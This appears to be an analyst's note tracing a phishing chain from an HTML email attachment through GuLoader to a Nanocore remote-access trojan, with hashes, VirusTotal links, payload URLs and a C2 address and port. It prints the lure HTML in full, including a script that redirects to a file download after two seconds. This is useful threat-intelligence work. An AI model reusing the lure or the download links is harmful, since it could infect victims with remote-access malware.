- Email with file attachment named: #08492.html
- #08492.html --> #08492.zip --> #0844.IMG --> #0844.exe --> SINSINCITY_encrypted_3280000.bin
- #08492.html
- ===========
- <html>
- <head>
- <title>#08492</title>
- <script src="http://code.jquery.com/jquery-3.2.1.min.js"></script>
- <script>
- $(function() {
- $('a[data-auto-download]').each(function(){
- var $this = $(this);
- setTimeout(function() {
- window.location = $this.attr('href');
- }, 2000);
- });
- });
- </script>
- </head>
- <body>
- <center><img src="https://the.earth.li/~sgtatham/putty/latest/w32/psftp.exe"></center></img>
- <div class="wrapper">
- <p>
- <a data-auto-download href="https://www.sendspace.com/pro/dl/izzu4h"</a>.</p>
- </div>
- </body>
- </html>
- Downloads:
- ==========
- First download:
- psftp.exe (downloaded by first URL - probably legit PuTTY suite)
- bc59fa5dbb11f5d286fc41e8f25c6cc0
- Second download:
- #08492.zip
- 9bc2cefa6128b6187c0d9cecde5ce608
- Which contains:
- https://www.virustotal.com/gui/file/ac8745e4fee242c12d6692c4c92adaec467f06aa0285e67018ee00dae717d2dd/detection
- #0844.IMG
- 817788f932f5f5015adfff61767fb38f
- Which contains (this should be the GuLoader file):
- https://www.virustotal.com/gui/file/cd840d5ce4befb95f4ee4fdfd2bc312baa6983aebe52a127042dba03a3579576/detection
- #0844.exe
- 6458cae5ef3ffe2de7fdab0c43f49f1c
- Running the .exe downloads:
- https://drive.google.com/uc?export=download&id=1GHOBK1Y7MK13OpaHE25g6GvKcZvwaSSq
- https://doc-0o-5s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9eo36211iggnk2iei9m347crmqbo86j9/1584719025000/01552400289149162477/*/1GHOBK1Y7MK13OpaHE25g6GvKcZvwaSSq?e=download
- Which downloads (this should be the encoded Nanocore file):
- SINSINCITY_encrypted_3280000.bin
- b9b1e5661689775a1fd2825ad98d36ba
- Nanocore C2:
- 207.246.72.237:8806